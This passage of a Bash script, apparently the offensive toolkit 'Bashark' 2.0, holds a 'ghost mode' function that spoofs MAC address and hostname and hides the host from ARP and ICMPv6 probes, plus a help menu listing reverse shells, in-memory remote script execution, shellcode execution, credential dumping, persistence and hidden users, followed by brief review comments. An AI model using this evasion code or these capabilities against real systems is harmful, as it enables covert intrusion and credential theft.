1613 | iface=$2 1614 | fi 1615 | if [ $# -eq 0 ]; then 1616 | print_error "Specify the switch [on|off]" 1617 | else 1618 | SWITCH=$1 1619 | INTERFACE=$2 1620 | TMPMAC=/tmp/mac.ghost 1621 | ORGHOST=/tmp/host.ghost 1622 | ORGMAC="" 1623 | CMD=$( which ifconfig 2>/dev/null) 1624 | if [[ $? -gt 0 ]]; then 1625 | CMD=$( which ip ) 1626 | fi 1627 | if [[ "$SWITCH" = "on" ]] 1628 | then 1629 | if [ ! $(which ethtool) ] && [ ! -f /etc/udev/rules.d/70-persistent-net.rules ] 1630 | then 1631 | if [[ $CMD =~ .*ifconfig ]]; then 1632 | ORGMAC=$( $CMD $INTERFACE | grep ether | awk '{print $2}' ) 1633 | else 1634 | ORGMAC=$( $CMD link show $INTERFACE | awk '$1~/^link/{print $2}' ) 1635 | fi 1636 | else 1637 | if [[ $(which ethtool) ]] 1638 | then 1639 | ORGMAC=$(ethtool -P $INTERFACE) 1640 | ORGMAC=${ORGMAC#*:} 1641 | else 1642 | ORGMAC=$(cat /etc/udev/rules.d/70-persistent-net.rules | grep $INTERFACE | cut -d '"' -f 8) 1643 | fi 1644 | fi 1645 | echo -n $ORGMAC > $TMPMAC 1646 | print_info 'Spoofing MAC address ...' 1647 | /etc/init.d/network-manager stop &>/dev/null 1648 | if [[ $CMD =~ .*ifconfig ]]; then 1649 | $CMD $INTERFACE down 1650 | else 1651 | $CMD link set $INTERFACE down 1652 | fi 1653 | if [[ $? -ne 0 ]] 1654 | then 1655 | print_error "Wrong interface" 1656 | exit 3 1657 | fi 1658 | MAC=$(head -c 6 /proc/sys/kernel/random/uuid | sed 's/^\(..\)\(..\)\(..\).*$/48:0f:cf:\1:\2:\3/') 1659 | if [[ $CMD =~ .*ifconfig ]]; then 1660 | $CMD $INTERFACE hw ether $MAC 1661 | else 1662 | $CMD link set dev $INTERFACE address $MAC 1663 | fi 1664 | print_good "New MAC address: $MAC" 1665 | print_info 'Configuring kernel to restrict ARP/NDP requests in linking network mode ...' 
1666 | sysctl net.ipv4.conf.$INTERFACE.arp_ignore=8 > /dev/null 1667 | sysctl net.ipv4.conf.$INTERFACE.arp_announce=2 > /dev/null 1668 | ip6tables -I INPUT 1 -i $INTERFACE --protocol icmpv6 --icmpv6-type echo-request -j DROP 1669 | ip6tables -I INPUT 2 -i $INTERFACE --protocol icmpv6 --icmpv6-type neighbor-solicit -j DROP 1670 | print_info 'Reinitializing network interface ...' 1671 | print_info 'If not connected or taking too long - reconnect manually' 1672 | if [[ $CMD =~ .*ifconfig ]]; then 1673 | $CMD $INTERFACE up 1674 | else 1675 | $CMD link set $INTERFACE up 1676 | fi 1677 | /etc/init.d/network-manager start &>/dev/null 1678 | hostname > $ORGHOST 1679 | hostnamectl set-hostname $RANDOM 1680 | print_good 'New hostname : '$(hostname) 1681 | xauth add $(hostname)/$(xauth list | cut -d '/' -f 2 | tail -n 1) 1682 | chown $(echo $XAUTHORITY | cut -d '/' -f 3): $XAUTHORITY 2>/dev/null 1683 | print_question 'Perform DHCP (unless you want to specify your own IP)? (y/n)' 1684 | read dhcp 1685 | dhcp=${dhcp,,*} 1686 | dhcp=${dhcp::1} 1687 | if [[ "$dhcp" = "y" ]] 1688 | then 1689 | dhclient $INTERFACE &> /dev/null 1690 | fi 1691 | if [[ $CMD =~ .*ip ]] 1692 | then 1693 | print_info 'Erasing previous IP...' 1694 | sleep 4 1695 | $CMD addr del $(ip addr show dev $INTERFACE | grep second | cut -d ' ' -f 6 | cut -d '/' -f 1) dev $INTERFACE 1696 | fi 1697 | print_good "{magenta}Ghost mode enabled{reset}" 1698 | elif [[ "$SWITCH" = "off" ]] 1699 | then 1700 | if [ ! $(which ethtool) ] && [ ! -f /etc/udev/rules.d/70-persistent-net.rules ] 1701 | then 1702 | ORGMAC=$( cat $TMPMAC ) 1703 | else 1704 | if [[ $(which ethtool) ]] 1705 | then 1706 | ORGMAC=$(ethtool -P $INTERFACE) 1707 | ORGMAC=${ORGMAC#*:} 1708 | else 1709 | ORGMAC=$(cat /etc/udev/rules.d/70-persistent-net.rules | grep $INTERFACE | cut -d '"' -f 8) 1710 | fi 1711 | fi 1712 | print_info 'Reinitializing MAC address ...' 
1713 | echo 1714 | /etc/init.d/network-manager stop &>/dev/null 1715 | if [[ $CMD =~ .*ifconfig ]]; then 1716 | $CMD $INTERFACE down 1717 | $CMD $INTERFACE hw ether $ORGMAC 1718 | else 1719 | $CMD link set $INTERFACE down 1720 | $CMD link set dev $INTERFACE address $ORGMAC 1721 | fi 1722 | if [[ $? -ne 0 ]] 1723 | then 1724 | print_error "Wrong interface" 1725 | exit 3 1726 | fi 1727 | print_info 'Reconfiguring kernel to normal ARP/NDP linking network mode ...' 1728 | sysctl net.ipv4.conf.$INTERFACE.arp_ignore=0 > /dev/null 1729 | sysctl net.ipv4.conf.$INTERFACE.arp_announce=0 > /dev/null 1730 | ip6tables -D INPUT -i $INTERFACE --protocol icmpv6 --icmpv6-type echo-request -j DROP 1731 | ip6tables -D INPUT -i $INTERFACE --protocol icmpv6 --icmpv6-type neighbor-solicit -j DROP 1732 | print_info 'Restoring hostname ...' 1733 | xauth remove $(hostname)/$(xauth list | cut -d '/' -f 2 | tail -n 1) 2>/dev/null 1734 | chown $(echo $XAUTHORITY | cut -d '/' -f 3): $XAUTHORITY 2>/dev/null 1735 | hostnamectl set-hostname $(cat $ORGHOST) 1736 | print_info 'Reinitializing network interface ...' 1737 | print_info 'If not connected or taking too long - reconnect manually' 1738 | if [[ $CMD =~ .*ifconfig ]]; then 1739 | $CMD $INTERFACE up 1740 | else 1741 | $CMD link set $INTERFACE up 1742 | fi 1743 | /etc/init.d/network-manager start &>/dev/null 1744 | print_question 'Perform DHCP (unless you want to specify your own IP)? (y/n)' 1745 | read dhcp 1746 | dhcp=${dhcp,,*} 1747 | dhcp=${dhcp::1} 1748 | if [[ "$dhcp" = "y" ]] 1749 | then 1750 | dhclient $INTERFACE &> /dev/null 1751 | fi 1752 | sleep 2 1753 | /etc/init.d/network-manager restart &>/dev/null 1754 | rm -f $TMPMAC 1755 | print_good "{magenta}Ghost mode disabled{reset}" 1756 | fi 1757 | fi 1758 | fi 1759 | } 1760 | 1761 | ##Help command 1762 | #Finish and add mod command 1763 | help(){ 1764 | echo " 1765 | Bashark ver. 
2.0 Commands:

(${green}no root required${reset}):
${bold}_${reset}${green} -> ${reset}Go back to previous directory
${bold}bruteforce${reset}${green} -> ${reset}Perform a dictionary attack against a protected file
${bold}c${reset}${green} -> ${reset}Clear screen
${bold}cleanup${reset}${green} -> ${reset}Modify Bashark cleanup routine settings
${bold}cve${reset}${green} -> ${reset}Search for a kernel exploit
${bold}esc${reset}${green} -> ${reset}Escape to a non-restricted shell
${bold}fnd${reset}${green} -> ${reset}Recursively search for string occurrence in current directory
${bold}fndre${reset}${green} -> ${reset}Search for most popular regullar expressions in a file
${bold}fileinfo${reset}${green} -> ${reset}Inspect a file
${bold}getapp${reset}${green} -> ${reset}Enumerate installed applications
${bold}getconf${reset}${green} -> ${reset}Enumerate configuration files
${bold}getdbus${reset}${green} -> ${reset}List all available Dbus services
${bold}getidle${reset}${green} -> ${reset}List active PTYs and their idle time
${bold}getperm${reset}${green} -> ${reset}Show files and folders with special permissions
${bold}getsec${reset}${green} -> ${reset}Search for dereferences and presence of three most popular mac programs
${bold}help${reset}${green} -> ${reset}Show this help message
${bold}hosts${reset}${green} -> ${reset}Enumerate active hosts in background
${bold}keyinstall${reset}${green} -> ${reset}Add a RSA key to list of authorized SSH keys
${bold}isvm${reset}${green} -> ${reset}Check if os is running on virtual machine
${bold}jshell${reset}${green} -> ${reset}Establish a reverse interactive javascript shell
${bold}ldexec${reset}${green} -> ${reset}Execute a file without permission bit set
${bold}lg${reset}${green} -> ${reset}Search for regular expression in filenames of current directory
${bold}mex${reset}${green} -> ${reset}Make file executable
${bold}memexec${reset}${green} -> ${reset}Download and execute remote bash script in memory
${bold}mkd${reset}${green} -> ${reset}Create a directory
${bold}mod${reset}${green} -> ${reset}Modify every file in current directory with given extension
${bold}portscan${reset}${green} -> ${reset}Perform a portscan
${bold}quit${reset}${green} -> ${reset}Exit bashark
${bold}revshell${reset}${green} -> ${reset}Spawn a reverse shell
${bold}revshellgen${reset}${green} -> ${reset}Generate a reverse shell in different formats
${bold}shellcode${reset}${green} -> ${reset}Execute shellcode provided in "\x" escaped form
${bold}t${reset}${green} -> ${reset}Create a file
${bold}timestomp${reset}${green} -> ${reset}Change attributes of a file
${bold}usrs${reset}${green} -> ${reset}Show all users on the host
${bold}xml_dos${reset}${green} -> ${reset}Create a xml or yaml dos file
${bold}xxe${reset}${green} -> ${reset}Generate a xml external entity injection file

(${red}root required${reset}):
${bold}linikatz${reset}${red} -> ${reset}Enumerate plaintext and in-memory credentials
${bold}portblock${reset}${red} -> ${reset}Block all opened ports except whitelisted
${bold}persist${reset}${red} -> ${reset}Set a command to be executed after every boot
${bold}rootshell${reset}${red} -> ${reset}Create a rootshell
${bold}usradd${reset}${red} -> ${reset}Create a new hidden user (osx only)
${bold}forward${reset}${red} -> ${reset}Perform ssh port forwarding

To show additional information about specific command, type ' -h'
"
  # NOTE(review): on the shellcode line the `"\x"` ends the double-quoted
  # string, so the menu prints `provided in x escaped form`; `\"\\x\"` would
  # print the intended `"\x"`.
  # NOTE(review): "regullar" -> regular; "mac programs" means
  # mandatory-access-control systems (SELinux/AppArmor/PaX, see getsec).
  # NOTE(review): functions defined above but missing from this menu:
  # forkbomb, machange, aslray, ghost, shellshock, swapdump, uperm, watch
  # (the last three are stubs).
}